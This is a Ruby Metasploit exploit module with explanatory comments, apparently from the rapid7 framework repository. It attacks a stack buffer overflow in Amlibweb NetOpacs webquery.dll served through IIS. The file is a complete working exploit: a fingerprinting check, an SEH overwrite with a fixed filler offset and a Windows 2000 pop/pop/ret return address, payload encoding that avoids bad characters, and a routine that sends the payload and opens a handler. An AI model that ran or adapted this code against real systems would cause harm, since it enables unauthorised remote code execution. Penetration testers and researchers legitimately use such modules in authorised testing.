Path: blob/master/modules/exploits/windows/http/amlibweb_webquerydll_app.rb
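##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Request path of the vulnerable ISAPI extension; used by both check and exploit.
  WEBQUERY_PATH = '/amlibweb/webquery.dll'.freeze

  # Bytes of filler sent in the 'app' parameter before the SEH record. Taken
  # unchanged from the original module; it positions the overwrite for the
  # Windows 2000 / IIS 5 target below.
  SEH_OFFSET = 3028

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Amlibweb NetOpacs webquery.dll Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Amlib's Amlibweb
          Library Management System (NetOpacs). The webquery.dll
          API is available through IIS requests. By specifying
          an overly long string to the 'app' parameter, SeH can be
          reliably overwritten allowing for arbitrary remote code execution.
          In addition, it is possible to overwrite EIP by specifying
          an arbitrary parameter name with an '=' terminator.
        },
        'Author' => [ 'aushack' ],
        'Arch' => [ ARCH_X86 ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '66814' ],
          [ 'BID', '42293' ],
          [ 'URL', 'http://www.aushack.com/advisories/' ],
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
          'AllowWin32SEH' => true
        },
        'Payload' => {
          # No 'Space' limit is declared, so payload length is not bounded by
          # metadata; the SEH record is simply appended after SEH_OFFSET bytes.
          # 'Space' => 600,
          # The payload travels inside a URL query string, so the URL/query
          # delimiters (space, %, =, ?, /, \, :, @, ;, !, $) and line
          # terminators are excluded. '=' is listed twice ('=' and "\x3d");
          # harmless, kept as in the original.
          'BadChars' => "\x00\x0a\x0d\x20%=?\x2f\x5c\x3a\x3d\@;!$",
          # Alphanumeric-only encoding keeps the encoded payload clear of the
          # bad-char list above.
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
          'DisableNops' => true,
          # Move ESP away from the overflowed region before the payload runs
          # so the decoder's own stack does not trample the code it executes.
          'StackAdjustment' => -3500,
        },
        'Platform' => ['win'],
        'Targets' => [
          # aushack - Tested OK 20100803 w2k IIS5
          [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5
          # [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only.
        ],
        'DisclosureDate' => '2010-08-03', # 0day
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(80),
      ]
    )
  end

  # Fingerprint the target with a harmless GET whose only query parameter has
  # a random name and an empty value. webquery.dll echoes the unrecognised
  # parameter name back in its "BAD REQUEST" page, so seeing our random marker
  # echoed shows the vulnerable ISAPI DLL is reachable at the expected path.
  # That proves presence, not the overflow itself, hence Appears rather than
  # Vulnerable. The marker is deliberately short (10 bytes): the '?{name}='
  # form is the same request shape noted in the Targets comment as an EIP
  # overwrite vector on IIS 6, so a long probe could crash the service.
  #
  # @return [Msf::Exploit::CheckCode] Appears when the marker is echoed,
  #   Unknown when the host cannot be reached or returns no data (the
  #   original reported Safe here, a false negative), Safe when a response
  #   arrives that is not webquery.dll's error page.
  def check
    marker = Rex::Text.rand_text_alpha(10)

    begin
      connect
      sock.put("GET #{WEBQUERY_PATH}?#{marker}= HTTP/1.0\r\n\r\n")
      res = sock.get_once
    rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e
      vprint_error("Connection to #{rhost}:#{rport} failed: #{e.message}")
      return Exploit::CheckCode::Unknown
    ensure
      # disconnect is a no-op when connect never produced a socket.
      disconnect
    end

    # A read timeout (nil) or empty reply tells us nothing about the target.
    return Exploit::CheckCode::Unknown if res.nil? || res.empty?

    echoed = res.match(/<H1>BAD REQUEST<\/H1><P>Your client sent a request that this server didn't understand.<br>Request:\s(?<name>\w+)/)
    return Exploit::CheckCode::Appears if echoed && echoed[:name] == marker

    Exploit::CheckCode::Safe
  end

  # Deliver the SEH overwrite: SEH_OFFSET bytes of alphanumeric filler in the
  # 'app' parameter followed by the SEH record (short jump + pop/pop/ret from
  # target.ret + encoded payload) built by the Seh mixin. The request bytes
  # are kept identical to the original module's, including the HTTP/1.0
  # request line with no Host header and the extra CRLF after it, because
  # the overwrite depends on the exact amount of data preceding the handler.
  #
  # @return [void]
  def exploit
    print_status("Sending #{SEH_OFFSET}-byte filler plus SEH record to #{rhost}:#{rport} (#{target.name})")

    connect
    begin
      seh = generate_seh_payload(target.ret)
      buffer = Rex::Text.rand_text_alphanumeric(SEH_OFFSET) + seh
      request = "GET #{WEBQUERY_PATH}?app=#{buffer} HTTP/1.0\r\n"
      # Original trailer: the request line's CRLF plus "\r\n\r\n", i.e. one
      # CRLF more than HTTP needs. Preserved as sent upstream.
      sock.put(request + "\r\n\r\n")
      handler
    ensure
      # Always release the socket, even if payload generation or the send raised.
      disconnect
    end
  end
end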